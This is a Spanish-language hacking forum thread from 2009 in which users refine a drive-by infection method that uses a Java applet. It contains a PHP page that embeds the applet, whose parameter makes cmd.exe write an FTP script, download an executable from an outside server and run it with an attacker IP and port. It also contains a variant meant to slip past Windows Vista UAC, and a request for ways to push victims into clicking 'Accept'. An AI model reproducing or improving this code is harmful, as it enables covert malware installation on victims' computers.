[POC] Infección Mediante Java Applet (y VBScript)

andres52 · 23 Abril 2009, 07:02 AM

Listo, resuelto completamente... esque el código en php esta mal.. pero lo corregi y va perfecto.

andres52 · 25 Abril 2009, 01:10 AM

Hola, soy yo otra vez... xd

Bueno... va perfecto nadamás en mi maquina porqe trate de hacerlo funcionar en otras y aunque abre el certificado java no me abre ni me activa nada... y si por ejemplo le ponga que abra un mensaje (el de hola mundo) que pefectamente funciona en esta pc.. en cualquier otra no lo abre... no entiendo porqe!!

El host estoy usando es PHONE ACCES, que en realidad hostea en webspacemania.. no se si tarden mucho en actualizar o algo.. porfavor alguien podria explicarme porque no funciona?

Editado-- Ya se solucionó... era cosa del servidor xd

A2Corp · 23 Mayo 2009, 13:58 PM

Alguien lo ha probado en win Vista?
el "Control de cuentas de usuario" creo que no deja ejecutar el bat.

Quien logro infectar en vista?

A2Corp · 23 Mayo 2009, 16:50 PM

Investigue un poco y el problema esta en que no deja crear el archivo log.txt en la carpeta windows asi que podemos poner otra ruta.

Y hay otro problema que aun no soluciono:

Código [Seleccionar]

E:\>ftp -s:log.txt
ftp> servidor@servidor.com
Comando no v lido.
ftp> mipassword123
Comando no v lido.
ftp> cd /
Desconectado.
ftp> pwd
Desconectado.
ftp> binary
Desconectado.
ftp> get Virus.exe
Desconectado.
ftp> bye

aparece como comando no valido al tratar de conectar con el ftp....
Es por el UAC me imagino.

A2Corp · 23 Mayo 2009, 17:39 PM

Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

asi no tocamos ninguna ruta sospechosa para el UAC y nos deja hacer todo el proceso

m[a]rkus · 1 Junio 2009, 02:21 AM

Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:

Código [Seleccionar]

<?php
if(isset($HTTP_GET_VARS["board"])) {
	$ip = $HTTP_GET_VARS["board"];
	echo $ip;
}
 
else $ip = "127.0.0.1";
 
if(isset($HTTP_GET_VARS["topic"])) {
	$puerto = $HTTP_GET_VARS["topic"];
	echo $puerto;
}
 
else $puerto = 666;
 
echo "<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo "<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe ".$ip." ".$puerto."&pause'>";
echo "</applet>";
 
?>

Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien

andres52 · 4 Julio 2009, 05:52 AM

Una duda, para que sirve el /c?

cmd.exe /c cd C:\...

solo por curiosidad :]

Novlucker · 4 Julio 2009, 23:24 PM

Código (dos) [Seleccionar]

C:\Documents and Settings\Novlucker>cmd /?
Inicia una nueva instancia del intérprete de comandos de Windows XP

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
 [[/S] [/C | /K] cadena]

/C Ejecuta el comando especificado en cadena y luego finaliza

Ejecuta todos los comandos que vienen después

Saludos

andres52 · 12 Julio 2009, 05:11 AM

Muchas gracias por tu respuesta Novlucker.

Ahora lo que quiero es borrar la carpeta creada aqui:

CitarLo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

le pongo &cd..&rd system32 /s /q y no funciona.. no la borra.. pero poniendo ese código directamente en la consola si la borra... porque?

Edit- Ya vi porque no la borra... tiene el exe activado todavia.. bueno no es de mucha importancia, pues si ya la persona esta infectada puedo borrar la carpeta manualmente Pero ahora el problema es otro, cuando el usuario es limitado y tiene el uac activado, no funciona el código, no tengo idea porque pero no crea la carpeta ni activa nada... aún cuando en el cmd si puedo hacerlo manualmente (y aún cuando ya probé sin el uac activado y si funcionaba) ¿Porque ocurre esto?

A2Corp · 15 Julio 2009, 03:26 AM

me tiene bien satisfecho este metodo de infección pero no del todo no falta el que por desesperado le pique a cancelar porque penso que era publicidad o alguna otra cosa.
Se les ocurre algo que oriente o casi obligue al usuario a darle click a Aceptar?
:/